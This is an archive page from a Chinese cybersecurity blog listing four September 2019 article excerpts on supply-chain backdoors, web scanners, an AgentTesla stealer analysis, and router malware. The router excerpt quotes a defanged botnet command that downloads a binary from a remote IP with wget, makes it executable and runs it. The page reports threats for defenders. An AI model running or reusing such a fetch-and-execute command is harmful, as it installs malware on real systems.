201909 - 蛋壳博客 - 网络安全博客

201909 - 蛋壳博客 - 网络安全博客 201909 - 蛋壳博客 - 网络安全博客

最新文章

业内新闻

开源软件的供应链安全吗?黑客正在利用源代码传播恶意软件

蛋壳 发布于 9-7

过去一年里,发生了一连串开源软件遭受供应链攻击的事件,并且态势愈演愈烈。就在最近,甚至发现2个独立的后门漏洞进入了数十万服务器管理员下载的库中。第一个曝光的后门来自Webmin,这是一个安装量超过100万,基于Web的管理工具。根据Webmin开发人员JamieCameron称,去年4月左右,攻击者破坏了用于开发新版本程序的服务器。然后,恶意使用...

阅读(107) 评论(0 )

业内新闻

漏洞扫描技巧之Web漏洞扫描器研究

3

蛋壳 发布于 9-7

0×00前言 之前我们简单介绍了一下扫描器中爬虫的部分,接下来将继续介绍一下扫描器中一些我们认为比较有趣的技巧。0×01编码/解码/协议在很久以前有人提问AMF格式的请求怎么进行检测,或者有什么工具可以检测。既然我们要讲解的是 Web漏洞扫描器,那么就先假设是AMFoverHTTP(这里并不需要你了解AMF,你只需要知道AMF...

阅读(111) 评论(0 )

业内新闻

一例信息窃取木马分析报告

44

蛋壳 发布于 9-7

一、前言近日,中兴通讯高级邮件防御系统捕获一例病毒样本。通过分析发现,该样本会通过进程替换等方式释放,并在傀儡进程中运行AgentTesla木马以达到信息窃取的目的。以下是对该样本的分析。二、样本简介该样本为Autoit3编写的exe文件:反编译出部分脚本,脚本做了较强的混淆:脚本使用了多种混淆手法,如常数被转换成数学运算、无用的随机变量赋值、调...

阅读(101) 评论(0 )

业内新闻

三款恶意软件同时目标锁定路由器

蛋壳 发布于 9-1

Neko7月22日,我们的蜜罐检测到一个僵尸网络的恶意软件样本,x86.neko(被TrendMicro检测为Backdoor.Linux.NEKO.AB),该样本具有弱口令爆破的功能,之后会执行以下命令:“cd/tmp/;wgethxxp://185.244.25.200/bins/x86.neko;chmod777x86.neko;./x86...

阅读(113) 评论(0 )


sitemap